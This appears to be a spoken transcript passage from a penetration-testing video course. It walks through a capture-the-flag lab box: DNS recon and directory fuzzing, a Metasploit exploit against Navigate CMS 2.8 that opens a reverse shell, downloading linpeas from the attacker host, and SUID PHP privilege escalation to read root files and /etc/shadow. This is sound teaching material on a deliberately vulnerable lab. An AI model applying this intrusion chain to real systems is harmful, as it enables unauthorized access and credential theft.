yet, and we're just going to keep that in the back of our mind. But we know that we need to access this web page. We're going to go ahead and try to do some directory busting first and see if we can't get there with that. So let's go ahead and take a look at the directory busting, and then we'll go from there. So new tab, we're going to do do -w user share word list. This should be starting to feel a little bit familiar, right? Dir buster for me, and then just tab through to get to the medium list, and then go ahead and say fuzz, and then we're just going to do -u with the IP address. For me, it's 130/fuzz. Run that and see if we can't find anything. And immediately we get something called secret. So let's go ahead and go over to /secret. It's a file. Let's go ahead and save that. Let's open the containing folder, and let's just open this if we can. Open up with mousepad. And it said, oh my God, you got root. Just kidding, search somewhere else. Directory busting won't give anything. This message is here so that you don't waste time directory busting this particular website. Alec. Okay, so what he's telling us is you're not going to find anything on this directory. Well, we're likely not going to find anything hunting down port 22. We're likely, I mean, we could attack maybe Alec at 22 with some weak passwords and see what we find. But that's not the entry port. And here we have 53, which means that this is running DNS, and it's running DNS for a reason. So we're going to do some recon on this. What we're going to do is we're going to just say, and I'm actually going to run it over here. We're just going to use a tool called DNS Recon, and we're going to say -r, and that is for our range of 127.0.0.0/24. We're just scanning the local host because that's where our machine is. And then we're going to provide the IP address of the box that we're actually looking for, which is 130. And then for D, you can literally type in whatever you want. We can just type in blah. D is just needed there for a dictionary, but we're not going to use it, and it's still going to be able to find it. If we take it out, it won't work, which I'll show you. Or D for domain, I'm sorry, not dictionary. D for domain. We're providing a domain, but it's going to look for that domain, but if we don't provide it, it won't search. So it requires the domain. Even though we don't have the domain or don't know the domain, it's still able to find it. So what it found was 127.0.0.1 at blackpearl.tcm, which means that there's DNS pointer record here to this web page. We need to go ahead and add that to our DNS in Etsy hosts. Okay, so what we can do is just nano Etsy hosts. And in here, you can see that we have our 127.0.0.1 for localhost and 127.0.1.1 for Cali. We need to add in the IP address, 168.138.130. We're just creating a DNS record here for blackpearl.tcm. So now we're going to say, hey, blackpearl.tcm allocates to this IP address, and the DNS is going to do its magic. So we're going to Control X, hit Y, hit Enter, and then in your web browser, go ahead and close it completely if you had one open, and then we're going to go back, open it up, and hopefully this will work. First go. So http://blackpearl.tcm. Okay, and if this happened correctly, you should see this page. Okay, if for some reason it did not load for you, go ahead, go back, close this out again, give it a second, let it repopulate. So here we are brought to this My Info page. Now we have seen this before, and again, we can get some information disclosure here. We can see that we're up against a Linux box. We can see the name of the box, Debian, system type. There might be some sort of execution we can run against this. But again, when we're up against a directory like this, we want to do some directory brute forcing and see if maybe we can get access to this machine or get access any further than what we are. So we're just going to want to fuzz the directory one more time and see if that leads to anything. As of right now, this info page is giving us info, yes, but there might be more hiding under the covers. So we're going to go ahead and go back, and we're going to just use fuff one more time. User share wordless, and I'm never going to get tired of saying that. Dirbuster, if I can type and then do my tabby thing. All right, so we're going to fuzz here, and then this time around we're going to do a -u, and we're going to do blackpearl.tcm, not the IP address, blackpearl, and we're going to say fuzz. Okay, and we're going to let this go through. We're going to look for anything that might show up, and immediately navigate shows up for us. So that's interesting. Let's go ahead and just navigate to navigate, shall we? Okay, we've got navigate CMS version 2.8, copyright 2021. And we're going to go ahead and just dig a little bit further into this. So my go-to is always Google. Just, hey, navigate CMS. We could look for exploit. We could also look for default credentials if there are any, see if we can go in there. But look at this. We've got unauthenticated remote code execution from exploit database. We can run it manually, or we can run it with Metasploit. So that's nice. We have options. So actually an exploit database is with Metasploit as well. I'm sure there is manual code out there, but for this one, since we haven't run Metasploit really much in the capstone, we're going to go ahead and mix it up and use a little bit of Metasploit here. Otherwise, I encourage you to go back and try this manually as well. But we're going to go ahead and open up Metasploit and see what it's got to offer for us. So MSF console, let this load real quick. And this gives us the module in here. I mean, we could search for it, but it's easier to just like, honestly, just copy this. And we should probably verify. Okay, so this is tested against Navigate CMS 2.8. This module exploits insufficient sanitization in the database protect method and allows us to bypass authentication. The module then uses path traversal vulnerability that allows authenticated users to upload PHP files. Together, we can get remote code execution. So it's chaining attacks here. First, it's going and it's bypassing authentication. It's then uploading malware, which uses a path traversal vulnerability to do that via the authenticated user, and then uses that to do remote code execution. So this is a chained attack here. This is pretty unique. So we're going to go ahead and go in here and just paste. Hopefully this works. This is Metasploit 6 I'm on. And it does. Okay, so when we're in here, we get to say options. And we're asked for an R host. We're asked for our port. We have our R port. We're asked for our L host, which is fine, I think. And then all we need is to just set that. PHP interpreter reverse TCP looks good, I think. All we're going to do is just make sure we set our R host here, which is going to be 192.168.138.130, but we also need to set the server virtual host. So we're going to say set vhost to blackpearl.tcm. Okay, everything else looks good. This is automatic target. We could do a show targets real quick and see if there's any other targets. There's not, just automatic. This is our attacker IP address, so that's fine. L port's fine. /navigate as the target URI looks fine. I always like to do options one more time, just get the visual of it. Everything looks good to me. So I'm gonna go ahead and just hit run, cross my fingers, hope and pray. Looks like we're getting a interpreter session back. So let's hit enter. Might be rushing the process here a little bit. We'll see if it works. Might take just a second to load. Okay, and from here we have a shell, so we can jump into a shell by typing shell. And in here, we don't see anything, but if we do who am I, you can see www-data, which means we're gonna have to do privilege escalation again. Now we are in this funky little area. We don't see like a shell, a normal shell type, right? We don't see like, hey, user at machine name. So we need to generate a TTY shell, and there's an easy way to do that. If you go out to Google, TTY shell, if you just Google that, you'll see spawning a TTY shell. Now, my favorite method of doing this is using Python, but we need to have Python on the machine. So you'll see what this does here in a second, but there's other ways to do it. Python's a quick way if Python is on the machine. So what we're gonna do is just say which Python. And you can see user bin Python exists on this machine, so that's where it's calling out. We're gonna go ahead and just copy this, and I'm gonna modify this a little bit. I like bin bash over just sh, so I'm going to open this up in a notepad or a text editor, paste this in here, add a BA in front of that for bash, copy, and then we're gonna go paste this into this shell. Okay. Now that looks a little bit better. Now we have an actual shell here. So what we need to do is we need to, again, go through our privilege escalation capabilities. In this instance, running sudo-l, we can try, see what's there. Sudo command not found. Running history, we could see if anything's there. Nothing. Great. So we need to check for privilege escalation. And we can do that using something like linps, right? This should be familiar now. We're going to do a print working directory. I'm going to go ahead and cd over to temp because that's where I like to move things. We are in temp. And now what we're going to do is I'm just going to upload this this file. So we're going to do a wget, and I don't have it hosted yet, but I'm just preparing it. So 192.168.138.131 attacker IP address / linpeas.sh and then linpeas.sh. This should be familiar. Now we're going to come in here and we're going to control plus here. We're going to go ahead and we're going to cd to transfer. You should have one of these by now. ls linpeas should be in there. So all we're going to do is python 3-m simple HTTP server. I'm thinking of my Python 2 days, and port 80. Now we should be able to run this. Okay. Let's go ahead and let's see if it actually generated. Did I call out linpeas? I did. Let's see, ls linpeas.sh. So I'm going to go ahead and just chmod +x linpeas.sh / linpeas.sh. Okay, now that's going to run. So let's let this run for a second. I'm going to pause the video, let it run through, and then we're going to come back and look at the results. Okay, so the results have come back, and we're going to look at it from the bottom up this time. Only because last time we took it from top down, we're going to go bottom up. The top section is really very system heavy and what users are there, and it's a lot of good information, but at the same time we can kind of just skip down to the bottom and scroll up. Like here we're looking for usernames or passwords that might exist, and we're just kind of going through and trying to see if there's anything in here where we could find that would be relevant. Remember, we're looking for red, and we're looking for red yellow specifically. That would be good. I'm going to skip over some of this, and I'm looking for, in particular, some different things. Now, if there's any sort of password or credential here, that could be interesting. If there's like a file named password or password credential, and you kind of learn what these are, you're really looking for something to stand out. None of these really stand out. These are all common kind of just paths on the system and common files on the system. Now, if we keep scrolling up, what I'm looking for are any sort of interesting writable files, like here, run PHP, run lock, but there's like, we need to be able to have something that we can abuse the feature of. It has to be more than just writable. So again, this is providing information, but it's not always going to be one specific thing. Now, backup could be interesting. Like there's backup files. It looks like this is specifically to the var www navigate. There could be information in this backup folder. Like there could be perhaps like passwords or something in here. So this could be an area where we might want to look at, just because there might be a password for a user. That user might be the root account password. We have no idea. So we kind of want to look at that. We do want to know what other users are on this computer. So starting at the top is not a bad idea. We could also just cat the etc password file and see what's going on there. In this instance, we see root, we see www-data. There might be more users. We're not sure quite yet. Keep scrolling up. Let's see if there's anything in here. Capabilities could be a possibility for us to look through. We'd have to look at GTFO bins and see. This is something that's a little bit beyond the scope of this course, but it is covered in the Prevest courses. And we're going to keep scrolling up. And this is where this gets a little bit interesting, especially when I start seeing unknown SUID binaries. So let's talk through the SUID and the sticky bits and all that good stuff real quick. So this is actually a great example. So we're looking in here, and we have what is called an SUID set. Now, if you remember or recall from our early Linux lessons, we have file permissions. We have read, write, execute. Let's scroll down a little bit, like right here. Read, write, execute. This is the root setting, okay? This is the owner setting, I should say. Owner of the file, this is the setting. Read blank S, okay? This is actually SGID. This is, okay, let's pretend this says execute, like this right here. Read blank execute. So this is the group setting. Anybody belonging to this group has read and execute permissions. They do not have write permissions. Anybody in this one, okay, this is global. This is read, execute again. So we see here who's the owner of the file. when we're looking at all of these, we see root owns all of these different binaries here. Okay, now let's talk about SUID. You see, instead of read, write, execute, we have read, write, S. Okay, S is our SUID. This means that we can run this, and whenever we run this here, we have the ability to run this as the user that owns it. This is a, and the SUID, we're on the root here, or the owner, sorry, we're on the owner, so we can run this as the person that owns it, which is root. Now you see down here what is called an SGID, which means we can run as the group, and that's sticky right here. Or it's an S right here. I keep calling it sticky. Sticky bit is when it's in this. When you see an S in this area right here for everybody else, that's called the sticky bit. Here is SGID, and in this group setting, it's an SUID. When we look at SUID, it's very interesting because we have root ownership. We can run this binary as root and abuse that feature. Now, there is a quick way to do this, and I can show you how the script is running this, but this is really just looking for permission settings. So we can come through and look, and if you ever go through a checklist, you'll see something like this, where it's just doing a quick find command, and it's looking to see if it can find the permission settings on these. Okay, so permission is going to be 4000, and this is looking specifically for that SUID, and we're just going to put this to dev null here. And now you find all of these in a much cleaner setting. So from our perspective, what we want to do is look at this, because not having the SUID enabled does not necessarily make it vulnerable. But we have a great website that we looked at earlier, GTFO bins, okay, .github.io. And we can do something like this. We can come in here and say, okay, we've got SUID. And then maybe we want to start looking through some of these, like maybe like, I don't know, mount, for example, if we can come through, see if mount's in here. Mount, but I'm looking right here, not there. This new GRP, not there. PHP is there, even though it's 7.3, PHP is there. So maybe we want to open that. Like switch user, SU, I don't see it in here. And you would just go through this list and say, okay, does anything on this list stand out as being a privilege escalation? Now, you are not expected to remember all these. There are some that you will see and it will stand out because you've done it time and time again. But for this situation, this is absolutely what the GTFO bins is built for. So we could scroll down over to SUID and click on it, and it says, if the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate, or maintain privilege access as a SUID backdoor. Okay, if it is used to run sh-p, omit the -p argument on systems like Debian that allow the default sh shell to run. So it's giving us some instruction here, okay? So all we need to do on this is we just need to run the PHP, and we need to run it with this rest of this setting here. Okay, that's really it. And we're going to call out that binary specifically. So you copy this, come back in here. We see the binary is sitting in user bin PHP 7.3, and it shouldn't matter that it's PHP 7.3. Just paste the selection. Okay, this is going to execute bin sh as the root user, giving us, hopefully, a root shell, which it gives us the EUID of root, okay? Which means, even though it says we are UID of www data and a group ID of www data, look at this EUID. What we can do with this is cd to root ls cat flag.txt. We are staying as the root user, but we're running in a shell that is executed by root. Okay, so it said, good job on this one. Finding the domain name may have been a little guessy, but the goal of this box is to teach about virtual host routing, which is used a lot on CTS, which is true. So, and proof of concept here is you should be able to cat the etc shadow file. Okay. Prior to this, we would not have been able to do that. Doesn't matter that when we write who am I, oh, we're actually showing as root, but our ID is still staying as www data, okay? but we are executing as root right now. So keep that in mind. We are the root user. We have owned this machine as the root user. And that's it. So SUID is a new lesson for you. Again, if you like this concept of privilege escalation, we are scratching the surface. There's so much to learn. There's always new tips and techniques out there. I encourage you, if you're interested in the CTF path, again, to check out the escalation courses. If not, we're going to start moving into exploit development. We're going to start moving into some of the other stuff that's out there with the Active Directory pen testing and get more into the realistic stuff. So this is good foundational lessons, but I look forward to seeing you in the next video. Well, that is it, everybody, for this course. If you've made it through what is now nearly 15 hours, I think we just crossed 14 and a half hours. If you made it through all that time, pat yourself on the back. Most people don't make it this far. Hacking is difficult. A lot of people think it sounds cool, it sounds sexy. They start getting into it, and then they just start to fall off. So if you've made it this far, applauds to you. There's a lot of different paths that you can take from here. You can keep going on. I would highly, highly recommend learning web applications, learning Active Directory pen testing, picking up some skills on open source intelligence, adding to your reconnaissance, all of the above. Everything that we talked about in this course so far, building upon that, expanding upon that, especially if you're looking at getting into this field. Anyways, I won't keep any more of your time because I've already kept you for enough time. So that is it. Thank you so much for joining me. If you would please, if you haven't already, consider subscribing to this channel. Just want to get to that million, get that plaque, and then maybe retire. Who knows? But thank you again. Until next time, my name is Heath Adams, aka the Cyber Mentor, and I do thank you for joining me. Peace out.